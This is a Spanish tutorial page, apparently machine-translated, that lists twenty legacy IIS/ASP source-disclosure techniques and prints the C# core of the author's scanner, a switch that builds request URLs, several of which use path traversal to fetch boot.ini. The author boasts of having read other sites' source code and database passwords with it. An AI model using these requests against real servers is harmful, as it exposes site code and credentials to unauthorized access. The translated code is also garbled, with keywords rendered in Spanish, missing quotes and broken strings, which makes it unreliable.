Inicio>Tutorial de programación de red>Tutorial ASP

20 Métodos y herramientas para ver el código fuente del programa ASP

Autor:Eve Cole Fecha de actualización:2025-03-13 14:32:01

Como todos sabemos, la plataforma de Windows tiene muchas lagunas, los parches son uno tras otro, pero siempre no es suficiente para compensarlo. Resumí los 20 métodos que conozco sobre mirar el código fuente de ASP y escribí una aplicación en C# para escanear estas vulnerabilidades. Pero en los últimos dos días, realmente vi el código fuente de muchos sitios web, incluidas las contraseñas de la base de datos. a la base de datos y haz lo que quieras. Primero, enumere estos 20 métodos a continuación:

.

%81

::DATOS

%2e

%2e%41sp

+.htr

//

Longhtr

.bak

codebrwss.asp

showcode.asp

null.htw

qfullhit.htw

qsumrhit.htw

Query.idq

buscar/qfullhit.htw

búsqueda/qsumrhit.htw

iirturnh.htw

.htw

Traducir: F

Las primeras 10 de las vulnerabilidades anteriores se agregan directamente al archivo ASP, como %81 es xxx.asp %81. : El método F no está disponible directamente a través del navegador. Descargue todo de mi sitio.

Switch (this.cbomethod.selectedIndex)

{

Caso 0: // Leer directamente

strRequestFile = strserver + strurl;

romper;

Caso 5: //%2e%41sp

strrequestFile = strserver + strpath + strfirst

+ %2e %41sp;

romper;

Caso 8: // Longhtr

strrequestfile = strserver + strurl

+ +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%. HTR;

romper;

Caso 10: //codebrwss.asp

strrequestFile = strserver + /iissamples/exair/howitworks/codebrwss.asp?source=

+ Strurl;

romper;

Caso 11: //showcode.asp

strrequestFile = strserver + /iissamples/exair/howitworks/codebrwss.asp?source=

+ /msadc/../../../boot.ini;

romper;

Caso 12: //null.htw

strrequestFile = strserver + /null.htw?ciwebhitsfile=

+ strurl + %20 & cirestriction = none & cihilitetype = full;

romper;

Caso 13: //qfullhit.htw

strRequestFile = strserver + /iissamples/issamples/oop/qfullhit.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = ninguno

+ & Cihilitetype = completo;

romper;

Caso 14: //qsumrhit.htw

strRequestFile = strserver + /iissamples/issamples/oop/qsumrhit.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = ninguno

+ & Cihilitetype = completo;

romper;

Caso 15: //query.idq

strrequestFile = strserver + /query.idq?citemplate=/../../boot.ini

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.HTX;

romper;

Caso 16: //search/qfullhit.htw

strRequestFile = strserver + /iissamples/exair/search/qfullhit.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = ninguno

+ & Cihilitetype = completo;

romper;

Caso 17: // búsqueda/qsumrhit.htw

strRequestFile = strserver + /iissamples/exair/search/qsumrhit.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = ninguno

+ & Cihilitetype = completo;

romper;

Caso 18: //iirturnh.htw

strRequestFile = strserver + /iishelp/iis/misc/iirturnh.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = ninguno

+ & Cihilitetype = completo;

romper;

Caso 19: //.htw

strrequestfile = strserver + strurl

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%.HTW?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = ninguno

+ & Cihilitetype = completo;

romper;

por defecto:

strRequestFile = strserver + strurl + this.cbomethod.text;

}

Artículos relacionados